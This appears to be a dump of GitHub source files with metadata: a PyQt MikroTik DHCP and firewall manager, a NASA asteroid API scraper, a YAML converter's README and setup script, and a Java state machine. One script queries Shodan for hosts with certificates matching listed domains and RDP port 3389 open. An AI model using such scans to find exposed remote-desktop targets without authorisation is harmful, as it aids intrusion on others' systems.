MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(468, 155)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setGeometry(QtCore.QRect(350, 20, 99, 27))\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton_3.setGeometry(QtCore.QRect(350, 70, 99, 27))\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.comboBox = QtWidgets.QComboBox(self.centralwidget)\n self.comboBox.setGeometry(QtCore.QRect(220, 20, 85, 27))\n self.comboBox.setObjectName(\"comboBox\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(30, 20, 131, 27))\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(140, 20, 80, 27))\n self.label_2.setObjectName(\"label_2\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 468, 25))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton_4.setGeometry(QtCore.QRect(20, 70, 180, 27))\n self.pushButton_4.setObjectName(\"pushButton_4\")\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Mikrotik host control\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"Изменить\"))\n self.pushButton_3.setText(_translate(\"MainWindow\", \"Логи\"))\n self.pushButton_4.setText(_translate(\"MainWindow\", \"Обновить список хостов\"))\n self.label.setText(_translate(\"MainWindow\", \"Выберите хост:\"))\n\n\n" }, { "alpha_fraction": 0.5071384310722351, "alphanum_fraction": 0.5083798766136169, "avg_line_length": 45.60869598388672, "blob_id": "c5da0413016538087cedecb72c2f8cdda6605548", "content_id": "a9b429299abfe5a173ee9ed54012aeecbd0d4628", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3222, "license_type": "no_license", "max_line_length": 121, "num_lines": 69, "path": "/filter.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import io\nimport dhcp_hosts\nimport logging\nfrom contextlib import redirect_stdout\nfrom re import match\n\n\nclass Filter:\n def __init__(self, router):\n self.router = router\n self.ids = dict()\n self.answer = None\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n\n def forwardblock(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/add', '=chain=forward', '=action=reject',\n '=reject-with=icmp-admin-prohibited',\n '=comment=' + method + '_' + self.hosts_dict[host]['address'], '=place-before=0',\n '=src-address=' + self.hosts_dict[host]['address']])\n answer = buf.getvalue()\n logging.debug(answer)\n\n def isblocked(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/print', '?comment=' + method + '_'\n + self.hosts_dict[host]['address']])\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n self.ids[host] = match('^.*\\.id=(.*)', line).group(1)\n return True\n else:\n return False\n\n def disable_rule(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/print', '?comment=' + method + '_'\n + self.hosts_dict[host]['address']])\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/set', '=.id=' + match('^.*\\.id=(.*)', line).group(1),\n '=disabled=yes'])\n disabled = buf.getvalue()\n logging.debug(disabled)\n\n def delete_rule(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/print', '?comment=' + method + '_'\n + self.hosts_dict[host]['address']])\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/remove', '=.id=' + match('^.*\\.id=(.*)', line).group(1),])\n deleted = buf.getvalue()\n logging.debug(deleted)\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5217241644859314, "alphanum_fraction": 0.5227586030960083, "avg_line_length": 45.015872955322266, "blob_id": "41a20949c0d997d50b18141d459dccc7b6133609", "content_id": "30aa54ec639fbfb9e1032cf05a30593f06fe084b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2993, "license_type": "no_license", "max_line_length": 120, "num_lines": 63, "path": "/dhcp_hosts.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import io\nimport logging\nfrom contextlib import redirect_stdout\n\n\nclass DhcpHosts:\n\n hosts = dict()\n\n def __init__(self, router):\n self.__class__.hosts = dict()\n self.router = router\n self.get_hosts()\n\n def talk(self, question):\n logging.debug(' Отправляю запрос {}....'.format(question))\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk([\"{}\".format(question)])\n answer = buf.getvalue()\n if \">>> =message=no such command\" in answer.split('\\n') \\\n or \">>> =message=no such command prefix\" in answer.split('\\n'):\n logging.debug(' Получен ответ {}!'.format(answer))\n logging.debug(' Введенный запрос не корректен!')\n else:\n return answer\n\n def get_hosts(self):\n try:\n hosts_list = self.talk('/ip/dhcp-server/lease/print').split('>>> !re')\n hosts_list.remove('<<< /ip/dhcp-server/lease/print\\n<<< \\n')\n for host in range(0, len(hosts_list)):\n self.__class__.hosts[host] = {}\n for element in hosts_list[host].split('\\n'):\n if element == '>>> ' or element == '':\n continue\n elif element == '>>> !done':\n break\n self.__class__.hosts[host].update({element.split('=')[1]: element.split('=')[2]})\n self.__class__.hosts = {nhost['host-name']: nhost for nhost in self.__class__.hosts.values()}\n logging.info(' Хосты: {}'.format(self.__class__.hosts.keys()))\n logging.debug(':')\n logging.debug(self.__class__.hosts)\n except ValueError:\n logging.debug('Совсем нет Lease....')\n self.__class__.hosts = {'None': {'host-name': 'None'}}\n\n def make_static(self, *args):\n for arhost in args:\n if arhost in [kwhost['host-name'] for kwhost in self.__class__.hosts.values()]:\n logging.debug(' Задаем статику для {}, ID - {}'.format(arhost, self.__class__.hosts[arhost]['.id']))\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/dhcp-server/lease/make-static', '=.id='+self.__class__.hosts[arhost]['.id']])\n answer = buf.getvalue()\n logging.debug(answer)\n\n def remove_static(self, *args):\n for arhost in args:\n if arhost in [kwhost['host-name'] for kwhost in self.__class__.hosts.values()]:\n logging.debug(' Удаляем lease для {}, ID - {}'.format(arhost, self.__class__.hosts[arhost]['.id']))\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/dhcp-server/lease/remove', '=.id='+self.__class__.hosts[arhost]['.id']])\n answer = buf.getvalue()\n logging.debug(answer)\n\n" }, { "alpha_fraction": 0.6230893731117249, "alphanum_fraction": 0.672720730304718, "avg_line_length": 51.424530029296875, "blob_id": "f43c9bcc8b3b005006625d7b9d8be66c02ed4350", "content_id": "25cc69c5ec69a70670324cb8994cbe637c89a3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5669, "license_type": "no_license", "max_line_length": 83, "num_lines": 106, "path": "/sched_but.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'untitled3.ui'\n#\n# Created by: PyQt5 UI code generator 5.5.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(287, 381)\n Form.setAutoFillBackground(False)\n self.pushButton = QtWidgets.QPushButton(Form)\n self.pushButton.setGeometry(QtCore.QRect(100, 350, 99, 27))\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_2 = QtWidgets.QPushButton(Form)\n self.pushButton_2.setGeometry(QtCore.QRect(130, 180, 31, 21))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.label_7 = QtWidgets.QLabel(Form)\n self.label_7.setGeometry(QtCore.QRect(10, 0, 251, 31))\n self.label_7.setObjectName(\"label_7\")\n self.label = QtWidgets.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(0, 30, 91, 21))\n self.label.setObjectName(\"label\")\n self.dateTimeEdit = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit.setGeometry(QtCore.QRect(90, 30, 194, 27))\n self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n self.label_4 = QtWidgets.QLabel(Form)\n self.label_4.setGeometry(QtCore.QRect(0, 90, 151, 21))\n self.label_4.setObjectName(\"label_4\")\n self.radioButton = QtWidgets.QRadioButton(Form)\n self.radioButton.setGeometry(QtCore.QRect(150, 90, 117, 22))\n self.radioButton.setObjectName(\"radioButton\")\n self.buttonGroup_2 = QtWidgets.QButtonGroup(Form)\n self.buttonGroup_2.setObjectName(\"buttonGroup_2\")\n self.buttonGroup_2.addButton(self.radioButton)\n self.radioButton_2 = QtWidgets.QRadioButton(Form)\n self.radioButton_2.setGeometry(QtCore.QRect(150, 120, 117, 22))\n self.radioButton_2.setObjectName(\"radioButton_2\")\n self.buttonGroup_2.addButton(self.radioButton_2)\n self.radioButton_3 = QtWidgets.QRadioButton(Form)\n self.radioButton_3.setEnabled(True)\n self.radioButton_3.setGeometry(QtCore.QRect(150, 150, 117, 22))\n self.radioButton_3.setObjectName(\"radioButton_3\")\n self.buttonGroup_2.addButton(self.radioButton_3)\n self.dateTimeEdit_3 = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit_3.setGeometry(QtCore.QRect(90, 60, 194, 27))\n self.dateTimeEdit_3.setObjectName(\"dateTimeEdit_3\")\n self.label_3 = QtWidgets.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(0, 60, 91, 21))\n self.label_3.setObjectName(\"label_3\")\n self.dateTimeEdit_4 = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit_4.setGeometry(QtCore.QRect(90, 230, 194, 27))\n self.dateTimeEdit_4.setObjectName(\"dateTimeEdit_4\")\n self.dateTimeEdit_2 = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit_2.setGeometry(QtCore.QRect(90, 200, 194, 27))\n self.dateTimeEdit_2.setObjectName(\"dateTimeEdit_2\")\n self.label_2 = QtWidgets.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(0, 200, 91, 21))\n self.label_2.setObjectName(\"label_2\")\n self.radioButton_4 = QtWidgets.QRadioButton(Form)\n self.radioButton_4.setEnabled(True)\n self.radioButton_4.setGeometry(QtCore.QRect(150, 320, 117, 22))\n self.radioButton_4.setObjectName(\"radioButton_4\")\n self.radioButton_5 = QtWidgets.QRadioButton(Form)\n self.radioButton_5.setGeometry(QtCore.QRect(150, 290, 117, 22))\n self.radioButton_5.setObjectName(\"radioButton_5\")\n self.radioButton_6 = QtWidgets.QRadioButton(Form)\n self.radioButton_6.setGeometry(QtCore.QRect(150, 260, 117, 22))\n self.radioButton_6.setObjectName(\"radioButton_6\")\n self.label_5 = QtWidgets.QLabel(Form)\n self.label_5.setGeometry(QtCore.QRect(0, 260, 151, 21))\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(Form)\n self.label_6.setGeometry(QtCore.QRect(0, 230, 91, 21))\n self.label_6.setObjectName(\"label_6\")\n self.dateTimeEdit.setDisplayFormat('dd.MM.yyyy hh:mm')\n self.dateTimeEdit_2.setDisplayFormat('dd.MM.yyyy hh:mm')\n self.dateTimeEdit_3.setDisplayFormat('dd.MM.yyyy hh:mm')\n self.dateTimeEdit_4.setDisplayFormat('dd.MM.yyyy hh:mm')\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Расписание\"))\n self.pushButton.setText(_translate(\"Form\", \"Установить\"))\n self.pushButton_2.setText(_translate(\"Form\", \"+\"))\n self.label_7.setText(_translate(\"Form\", \"Format: day.month.year hour:min\"))\n self.label.setText(_translate(\"Form\", \"Включить :\"))\n self.label_4.setText(_translate(\"Form\", \"Повторять каждый :\"))\n self.radioButton.setText(_translate(\"Form\", \"день\"))\n self.radioButton_2.setText(_translate(\"Form\", \"месяц\"))\n self.radioButton_3.setText(_translate(\"Form\", \"год\"))\n self.label_3.setText(_translate(\"Form\", \"Отключить:\"))\n self.label_2.setText(_translate(\"Form\", \"Включить :\"))\n self.radioButton_4.setText(_translate(\"Form\", \"год\"))\n self.radioButton_5.setText(_translate(\"Form\", \"месяц\"))\n self.radioButton_6.setText(_translate(\"Form\", \"день\"))\n self.label_5.setText(_translate(\"Form\", \"Повторять каждый :\"))\n self.label_6.setText(_translate(\"Form\", \"Отключить:\"))\n\n\n\n\n" }, { "alpha_fraction": 0.8145161271095276, "alphanum_fraction": 0.8145161271095276, "avg_line_length": 40.33333206176758, "blob_id": "8a701d9a245a8609d80ceb77a431fba510ceafa5", "content_id": "4770c298615a8a81e48818bfe988e949880fb5ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 361, "license_type": "no_license", "max_line_length": 85, "num_lines": 6, "path": "/README.md", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# study\n\nПрограмма работает с Lease dhcp сервера, задает статику\\удаляет lease\n\nОбойти статику на dhcp-сервере можно статикой на устройстве, поэтому нужно выполнить:\nhttps://wiki.mikrotik.com/wiki/How_to_block_non_DHCP_clients_without_the_firewall\n" }, { "alpha_fraction": 0.5242603421211243, "alphanum_fraction": 0.5254437923431396, "avg_line_length": 29.178571701049805, "blob_id": "b4c317d3717334e7bf161ae48a6277230060d66a", "content_id": "660742d8c097ec4e0bdf00d76be19dcde5007161", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 67, "num_lines": 28, "path": "/same.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import logging\nimport io\nfrom contextlib import redirect_stdout\nfrom re import match\n\n\nclass Same:\n\n def __init__(self, router):\n self.router = router\n\n def make(self, *args):\n with io.StringIO() as buf, redirect_stdout(buf):\n if not self.router.talk(args):\n logging.debug('Already exist')\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n return match('^.*\\.id=(.*)', line).group(1)\n else:\n return False\n\n def getanswer(self, *args):\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(args)\n return buf.getvalue()\n" }, { "alpha_fraction": 0.6403564810752869, "alphanum_fraction": 0.6791852116584778, "avg_line_length": 42.61111068725586, "blob_id": "c3b16ff5b9631ca29b6726ded281a6fd6f45db2a", "content_id": "16f4773af34628f1813e19c5624ca2ce1653f1c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1581, "license_type": "no_license", "max_line_length": 70, "num_lines": 36, "path": "/but1.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'untitled2.ui'\n#\n# Created by: PyQt5 UI code generator 5.5.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtWidgets\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(150, 181)\n self.pushButton = QtWidgets.QPushButton(Form)\n self.pushButton.setGeometry(QtCore.QRect(20, 10, 99, 27))\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_2 = QtWidgets.QPushButton(Form)\n self.pushButton_2.setGeometry(QtCore.QRect(20, 50, 99, 27))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.pushButton_3 = QtWidgets.QPushButton(Form)\n self.pushButton_3.setGeometry(QtCore.QRect(20, 90, 99, 27))\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.pushButton_4 = QtWidgets.QPushButton(Form)\n self.pushButton_4.setGeometry(QtCore.QRect(20, 130, 99, 27))\n self.pushButton_4.setObjectName(\"pushButton_4\")\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"None\"))\n self.pushButton.setText(_translate(\"Form\", \"make static\"))\n self.pushButton_2.setText(_translate(\"Form\", \"inet is on\"))\n self.pushButton_3.setText(_translate(\"Form\", \"remove static\"))\n self.pushButton_4.setText(_translate(\"Form\", \"Расписание\"))\n\n" }, { "alpha_fraction": 0.578064501285553, "alphanum_fraction": 0.578064501285553, "avg_line_length": 35.904762268066406, "blob_id": "6cef16d0cdb9c449a2f288b2ef557952bdde5446", "content_id": "14afd66ae0c4de69594d1e37a1c8c0fa74d94e7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 775, "license_type": "no_license", "max_line_length": 88, "num_lines": 21, "path": "/scirpt.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import same\n\n\nclass Scripts(same.Same):\n\n def __init__(self, router):\n super().__init__(router)\n\n def make_script(self, host, addr, method, disabled='yes'):\n self.remove_script(host, method)\n self.make('/system/script/add', '=name={}_'.format(method) + host,\n '=source=: ip firewall filter {{ set [find comment=sched_{}] '\n 'disabled={}}}'.format(addr, disabled))\n\n def remove_script(self, host, method):\n script_id = self.make('/system/script/print', '?name={}_'.format(method) + host)\n if script_id:\n self.make('/system/script/remove', '=.id='+script_id)\n\n def script_is_here(self, host, method):\n return self.make('/system/script/print', '?name={}_'.format(method) + host)\n" } ]
10
jschelert/shodan-rest-api-python
https://github.com/jschelert/shodan-rest-api-python
2d5207e1230356eee6674495e40666ac94eb8280
e733aec49ddb5d432fec329fe5bfc31067adfb12
32cf361a6605c5adb651065ffd82a17c7dbbd325
refs/heads/master
2022-08-09T18:20:44.636096
2020-05-21T22:22:32
2020-05-21T22:22:32
265,963,490
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5904255509376526, "avg_line_length": 33.15151596069336, "blob_id": "31f220743d484c192764b789d3bb19a143df178b", "content_id": "b46a998b877580f8a603ca80df94db46652a6bc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1128, "license_type": "no_license", "max_line_length": 148, "num_lines": 33, "path": "/Shodan-Rest.py", "repo_name": "jschelert/shodan-rest-api-python", "src_encoding": "UTF-8", "text": "import shodan\nimport requests\nimport json\nimport time\nfrom csv import reader\n\n# Defines Variable for Current Time and Appends Shodan for File Creation\ncurrent_time = str(time.time())\n(\"shodan\", current_time + '.txt')\n\n#Shodan API Key\nSHODAN_API_KEY = \"\" \napi = shodan.Shodan(SHODAN_API_KEY)\n\n#Definte any facets\nFACETS = \"\"\n\n#Ports string variable\nPORT =\"Port:3389\"\n\n# Open File Shodan and writes via the json.dump method\nwith open(('shodan' + current_time + '.txt') , \"w\") as outfile:\n #Opens file of FQDN Suffixes\n with open('C:\\python38\\\\fdqn.txt', 'r') as f:\n for line in f:\n line = line.strip()\n SEARCH = \"ssl.cert.subject.cn:\" + line + ' ' + PORT\n print (SEARCH)\n searchResolve = 'https://api.shodan.io/shodan/host/search?' + '&key=' + SHODAN_API_KEY + '&query=' + SEARCH + '&facets' + FACETS\n resolved = requests.get(searchResolve)\n jsonResponse = resolved.json()\n json.dump(jsonResponse, outfile, ensure_ascii=False, indent=4)\n time.sleep(2)\n\n" } ]
1
alper-python/web_scraping_week1
https://github.com/alper-python/web_scraping_week1
d6c33adf69e63c93f9e652b4ec0922ffd30163fe
b9ef867c4259229f4220ddccd7d5fc7cd510d8d1
19e929eb01b930770cb0c9ce0c8cf8db7197eb1b
refs/heads/main
2023-05-03T03:29:12.727289
2021-05-22T09:25:39
2021-05-22T09:25:39
369,766,521
0
1
null
2021-05-22T09:23:04
2021-05-22T09:20:56
2021-05-09T23:38:04
null
[ { "alpha_fraction": 0.5565920472145081, "alphanum_fraction": 0.5945273637771606, "avg_line_length": 25.220338821411133, "blob_id": "ed425a61e969f16f76bffd2c5be197b69a81dbc7", "content_id": "6d07d84f2c6b0143bf804e2b127a351d8f0c536a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1634, "license_type": "no_license", "max_line_length": 85, "num_lines": 59, "path": "/web_scraping_week1.py", "repo_name": "alper-python/web_scraping_week1", "src_encoding": "UTF-8", "text": "import requests\r\nimport os\r\nimport csv\r\n\r\napi_key = 'DrP4hdZ7m6qTa3Zhm6fXgpx1esUUz27acB7BdwT8'\r\n\r\nurl = 'https://api.nasa.gov/neo/rest/v1/feed'\r\nstart_date = '2016-07-01'\r\nend_date = '2016-07-08'\r\nfinish_date = '2016-07-30'\r\n\r\nresponse1 = requests.get(url,params={\r\n 'start_date':start_date,\r\n 'end_date':end_date,\r\n 'api_key':api_key\r\n})\r\nasteroids1 = response1.json()\r\n\r\n#başlıklar için(csv dosyasının sistemde old knt et. yok ise bu başlıkları ekle.\r\nliste = []\r\nfor i in (asteroids1['near_earth_objects']['2016-07-01'][0]).keys():\r\n liste.append(i)\r\nif not os.path.exists(\"asteroids.cvs\"):\r\n with open(\"asteroids.cvs\", \"a\",newline=\"\") as cvsfile:\r\n writer = csv.writer(cvsfile)\r\n liste = (asteroids1['near_earth_objects']['2016-07-01'][0]).keys()\r\n writer.writerow(liste)\r\n\r\n\r\n\r\nliste = list(asteroids1['near_earth_objects']) #7 günlük tarih aralığını bulduk\r\nliste.sort()# tarihe göre sıraladık\r\nfor i in liste[:-1]:\r\n new_list = asteroids1['near_earth_objects'][i]\r\n print(i)\r\n for i in new_list:\r\n print(i)\r\n\r\n###\r\nloop = True\r\nwhile loop:\r\n\r\n print(asteroids1['links']['next'])\r\n url = asteroids1['links']['next']\r\n response1 = requests.get(url)\r\n asteroids1 = response1.json()\r\n\r\n liste = list(asteroids1['near_earth_objects']) # 7 günlük tarih aralığını bulduk\r\n liste.sort() # tarihe göre sıraladık\r\n\r\n for i in liste[:-1]:\r\n if i <= finish_date:\r\n new_list = asteroids1['near_earth_objects'][i]\r\n print(i)\r\n for i in new_list:\r\n print(i)\r\n else:\r\n loop = False\r\n break\r\n\r\n" } ]
1
markeyev/appengine-config-transformer
https://github.com/markeyev/appengine-config-transformer
dc005e63270ae017ea171472a86bbc54a9e805b2
f99da8256ff8c0468418eda267cde795ab60c446
3a0cf32a740afae47f713c603ccbb98804f7abc6
refs/heads/master
2022-02-28T09:03:18.840632
2019-10-05T14:54:07
2019-10-05T14:54:07
213,017,410
1
0
Apache-2.0
2019-10-05T14:52:04
2019-09-01T21:04:10
2019-10-05T14:29:04
null
[ { "alpha_fraction": 0.7476793527603149, "alphanum_fraction": 0.75527423620224, "avg_line_length": 36.03125, "blob_id": "3bc61f3b9136cbf6df41e2c03174be531b1cbb94", "content_id": "683e1d8f9288e24cc2a23589879af957822b27de", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1185, "license_type": "permissive", "max_line_length": 151, "num_lines": 32, "path": "/README.md", "repo_name": "markeyev/appengine-config-transformer", "src_encoding": "UTF-8", "text": "Copyright 2015 Google Inc.\nAll rights reserved.\n\n# App Engine Configuration File Transformer\n\nUse this command-line tool to transform and copy your YAML formatted App Engine configuration files\ninto JSON formatted files that are suppported by the Google App Engine Admin API.\n\n## Requirements:\n\n* Install Python, either:\n * [Python 2.7](https://www.python.org/)\n * [App Engine SDK for Python](https://cloud-dot-devsite.googleplex.com/appengine/downloads#Google_App_Engine_SDK_for_Python)\n* Install the 'yaml' library: [PyYAML package](https://pypi.python.org/pypi/PyYAML)\n\n### Example Installation:\n\n1. Download and install the [App Engine SDK for Python](https://cloud-dot-devsite.googleplex.com/appengine/downloads#Google_App_Engine_SDK_for_Python).\n1. Install the 'yaml' library: \n `sudo apt-get install python-yaml`\n1. Clone the appengine-config-transformer project: \n `git clone https://github.com/GoogleCloudPlatform/appengine-config-transformer.git`\n\n\n## Usage:\n\n ./convert_yaml.py app.yaml > app.json\n \n### Example:\n\n cd appengine-config-transformer \n ./convert_yaml.py $HOME/appengine-guestbook-python/app.yaml > $HOME/appengine-guestbook-python/app.json\n" }, { "alpha_fraction": 0.7115073204040527, "alphanum_fraction": 0.7204213738441467, "avg_line_length": 36.39393997192383, "blob_id": "fd71f1b2f855b5b181fc0b6be3f5dbe2b8dd5365", "content_id": "f559accdd985dcb333d7ce430038127c7e301281", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "permissive", "max_line_length": 77, "num_lines": 33, "path": "/setup.py", "repo_name": "markeyev/appengine-config-transformer", "src_encoding": "UTF-8", "text": "# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport setuptools\nimport os\n\n# Compute the package tree of yaml_conversion since distutils doesn't do it\n# for us.\npackages = []\nbase = os.path.dirname(__file__) or '.'\nfor root, dirs, files in os.walk(os.path.join(base, 'yaml_conversion')):\n if '__init__.py' in files:\n packages.append('.'.join(root[len(base) + 1:].split(os.path.sep)))\n\nsetuptools.setup(\n name=\"appengine-config-transformer\",\n version=\"0.1\",\n description=\"Tool for converting between YAML and JSON representations.\",\n packages=packages,\n py_modules=['convert_yaml'],\n entry_points={'console_scripts': ['convert_yaml=convert_yaml:main']},\n)\n" } ]
2
k-gregory/KPI
https://github.com/k-gregory/KPI
5e8f3c44d9d42cc7f48bfa81c4fb0f1362e21f61
333abfd850824693a8ead5dd0ca5702626e7b4bc
96e244f74604f5cb949a1c4aa7bead864cb272c0
refs/heads/master
2021-03-16T11:06:32.559712
2018-06-13T05:59:47
2018-06-13T05:59:47
86,113,595
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4980744421482086, "alphanum_fraction": 0.5053487420082092, "avg_line_length": 26.5, "blob_id": "43a2acd2155f47a7d080b2424de167c69f1a1cc0", "content_id": "2ccc37190b3763e0663482ecbe2aa2ffa3ad4a4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2337, "license_type": "no_license", "max_line_length": 56, "num_lines": 82, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab1/impl/StateFSM.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab1.impl;\r\n\r\nimport io.github.k_gregory.otp.lab1.Event;\r\nimport io.github.k_gregory.otp.lab1.FSM;\r\nimport io.github.k_gregory.otp.lab1.MachineState;\r\n\r\nimport static io.github.k_gregory.otp.lab1.Event.*;\r\n\r\npublic class StateFSM extends FSM {\r\n private PatternState s = PatternState.START;\r\n\r\n @Override\r\n public void reset() {\r\n s = PatternState.START;\r\n }\r\n\r\n @Override\r\n public MachineState nextState(Event e) {\r\n s = s.nextState(e);\r\n return s.getMachineState();\r\n }\r\n\r\n private enum PatternState {\r\n ERROR(MachineState.ERROR) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == PLUS) return Q1;\r\n else return ERROR;\r\n }\r\n },\r\n START(MachineState.START) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == PLUS) return Q1;\r\n else return ERROR;\r\n }\r\n },\r\n Q1(MachineState.Q1) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == DIGIT) return Q2;\r\n else return ERROR;\r\n }\r\n },\r\n Q2(MachineState.Q2) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == DIGIT) return Q2;\r\n else if (e == LATIN_CAPITAL) return Q3;\r\n else if (e == EOF) return SUCCESS;\r\n else return ERROR;\r\n }\r\n },\r\n Q3(MachineState.Q3) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == LATIN_CAPITAL) return Q3;\r\n else if (e == EOF) return SUCCESS;\r\n else return ERROR;\r\n }\r\n },\r\n SUCCESS(MachineState.SUCCESS) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n return ERROR;\r\n }\r\n 